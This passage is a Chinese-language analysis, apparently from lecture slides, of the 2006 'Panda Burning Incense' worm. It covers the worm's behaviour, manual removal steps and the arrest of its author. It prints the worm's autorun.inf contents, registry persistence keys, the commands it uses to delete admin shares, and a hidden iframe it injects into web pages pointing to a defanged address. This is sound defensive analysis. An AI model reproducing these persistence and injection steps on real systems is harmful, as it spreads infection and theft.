熊貓燒香病毒特點(diǎn)病毒名稱熊貓燒香

又稱尼姆亞、武漢男生、worm.whBoy.、worm.nimaya.

病毒類型蠕蟲病毒危險(xiǎn)級別★★★★★影響系統(tǒng)Win9X/ME/NT/2000/XP/2003

熊貓燒香病毒特點(diǎn)2006年底，我國互聯(lián)網(wǎng)上大規(guī)模爆發(fā)“熊貓燒香”病毒及其變種，該病毒通過多種方式進(jìn)行傳播，同時該病毒還具有盜取用戶游戲賬號、ＱＱ賬號等功能。該病毒傳播速度快，危害范圍廣，截至案發(fā)為止，已有上百萬個人用戶、網(wǎng)吧及企業(yè)局域網(wǎng)用戶遭受感染和破壞，引起社會各界高度關(guān)注。

《瑞星2006安全報(bào)告》將其列為十大病毒之首，在《2006年度中國大陸地區(qū)電腦病毒疫情和互聯(lián)網(wǎng)安全報(bào)告》的十大病毒排行中一舉成為“毒王”。熊貓燒香病毒特點(diǎn)熊貓燒香一個感染型的蠕蟲病毒，它能感染系統(tǒng)中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進(jìn)程并且會刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件，使用戶的系統(tǒng)備份文件丟失。

被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根香的模樣。熊貓燒香病毒特點(diǎn)湖北省公安廳2007年2月12日宣布，根據(jù)統(tǒng)一部署，湖北省網(wǎng)監(jiān)在多個省市公安機(jī)關(guān)的配合下，一舉偵破了制作傳播“熊貓燒香”病毒案，抓獲李?。?，２５歲，武漢新洲區(qū)人）。病毒制造者熊貓燒香病毒源碼分析含有病毒體的文件被運(yùn)行后，病毒將自身拷貝至系統(tǒng)目錄，同時修改注冊表將自身設(shè)置為開機(jī)啟動項(xiàng)，并遍歷各個驅(qū)動器，將自身寫入磁盤根目錄下，增加一個Autorun.inf文件，使得用戶打開該盤時激活病毒體。隨后病毒體開一個線程進(jìn)行本地文件感染，同時開另外一個線程連接網(wǎng)站下載ddos程序進(jìn)行發(fā)動惡意攻擊。病毒結(jié)構(gòu)

主程序流程圖熊貓燒香病毒主要行為分析熊貓燒香病毒樣本

熊貓燒香病毒感染D盤中的文件熊貓燒香病毒主要行為分析熊貓燒香病毒主要行為分析（2）復(fù)制自身到系統(tǒng)目錄下：C:\WINDOWS\System32\Drivers\spoclsv.exe。

熊貓燒香病毒在系統(tǒng)盤下生成的文件熊貓燒香病毒主要行為分析（3）創(chuàng)建啟動項(xiàng)：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]svcshare"="%System%\drivers\spoclsv.exe"

熊貓燒香在注冊表中添加啟動項(xiàng)熊貓燒香病毒主要行為分析（4）在各分區(qū)根目錄生成病毒副本：X:\setup.exeX:\autorun.inf其中autorun.inf中的內(nèi)容是：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe熊貓燒香病毒主要行為分析（5）使用netshare命令關(guān)閉管理共享：cmd.exe/cnetshareX$/del/ycmd.exe/cnetshareadmin$/del/y（6）修改“顯示所有文件和文件夾”設(shè)置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]"CheckedValue"=dword:00000000（7）嘗試關(guān)閉安全軟件相關(guān)窗口：天網(wǎng)防火墻進(jìn)程、VirusScan

、NOD32等

（8）嘗試結(jié)束安全軟件相關(guān)進(jìn)程：Mcshield.exe

VsTskMgr.exe等

熊貓燒香病毒主要行為分析（9）禁用安全軟件相關(guān)服務(wù)：Schedulesharedaccess

RsCCenter

等（10）刪除安全軟件相關(guān)啟動項(xiàng)：

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTaskSOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP（11）遍歷目錄修改htm/html/asp/php/jsp/aspx等網(wǎng)頁文件，在這些文件尾部追加信息：<iframe

src="hxxp:///wuhan/down.htm"width="0"height="0"frameborder="0"></iframe>（12）在訪問過的目錄下生成Desktop_.ini文件，內(nèi)容為當(dāng)前日期。（13）此外，病毒還會嘗試刪除GHO文件。熊貓燒香病毒主要行為分析病毒還嘗試使用弱密碼將副本以GameSetup.exe的文件名復(fù)制到局域網(wǎng)內(nèi)其它計(jì)算機(jī)中。弱密碼文件

熊貓燒香病毒手工清除（1）結(jié)束病毒進(jìn)程：%System%\drivers\spoclsv.exe

查看當(dāng)前運(yùn)行spoclsv.exe的路徑（2）刪除病毒文件：%System%\drivers\spoclsv.exe不同的spoclsv.exe變種，此目錄可不同。有的病毒變種可能在以下目錄中：C:\WINDOWS\System32\Drivers\spoclsv.exe。

（3）刪除病毒啟動項(xiàng)：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"

熊貓燒香病毒手工清除（4）通過分區(qū)盤符右鍵菜單中的“打開”進(jìn)入分區(qū)根目錄，刪除根目錄下的病毒文件：X:\setup.exeX:\autorun.inf（5）恢復(fù)被修改的“顯示所有文件和文件夾”設(shè)置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]"CheckedValue"=dword:00000001（6）修復(fù)或重新安裝被破壞的安全軟件。2007年2月3日，“熊貓燒香”病毒的制造者李俊落網(wǎng)。李俊向警方交代，他曾將“熊貓燒香”病毒出售給120余人，而被抓獲的主要嫌疑人僅有6人，所以不斷會有“熊貓燒香”病毒的新變種出現(xiàn)。隨著中國首例利用網(wǎng)絡(luò)病毒盜號牟利的“熊貓燒香”案情被揭露，一個制“毒”、賣“毒”、傳“毒”、盜賬號、倒裝備、換錢幣的全新地下產(chǎn)業(yè)鏈浮出了水面。中了“熊貓燒香”病毒的電腦內(nèi)部會生成帶有熊貓圖案的文件，盜號者追尋這些圖案，利用木馬等盜號軟件，盜取電腦里的游戲賬號密碼，取得虛擬貨幣進(jìn)行買賣。李俊處于鏈條的上端，其在被抓捕前，不到一個月的時間至少獲利15萬元。而在鏈條下端的涉案人員張順目前已獲利數(shù)